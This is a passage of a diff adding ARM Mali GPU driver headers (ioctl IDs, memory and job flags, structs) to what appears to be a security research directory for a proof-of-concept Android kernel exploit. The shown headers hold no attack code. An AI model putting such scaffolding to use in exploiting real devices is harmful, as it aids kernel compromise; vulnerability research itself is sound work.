KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define 
KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h new file mode 100644 index 0000000..b1cf438 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h @@ -0,0 +1,1216 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include <linux/types.h> + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. 
+ * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected). 
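+ *
+ * An illustrative sketch (the variable names info and counter_va are
+ * assumptions, not from this patch): requesting heap-usage reporting for a
+ * JIT allocation, where counter_va is the GPU address of a __u32 counter:
+ *
+ *   struct base_jit_alloc_info info = {0};
+ *   info.flags = BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE;
+ *   info.heap_info_gpu_addr = counter_va;   (must be non-zero with this flag)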
+ */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. 
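+ *
+ * As an illustrative sketch (atom and the id 5 are assumed values), an
+ * ordering-only dependency on atom 5 would be expressed through the
+ * pre_dep array of the submitted atom:
+ *
+ *   atom.pre_dep[0].atom_id = 5;
+ *   atom.pre_dep[0].dependency_type = BASE_JD_DEP_TYPE_ORDER;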
+ * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. Not specifying the + * correct settings can/will cause an early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and that doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job. 
Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structure which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job to free the JIT allocation is still made. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests a single or multiple just-in-time allocations created by + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests external resource(s) are mapped once the dependencies + * of the job have been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests external resource(s) are unmapped once the dependencies + * of the job has been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs. 
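+ *
+ * A hedged example of a compute-only atom's requirements (the particular
+ * combination is chosen for illustration only):
+ *
+ *   atom.core_req = BASE_JD_REQ_ONLY_COMPUTE | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP;
+ *   atom.device_nr = 0;   (selects the core group, see the next flag below)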
+ */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. 
+ * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. 
+ * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct base_jd_fragment { + __u64 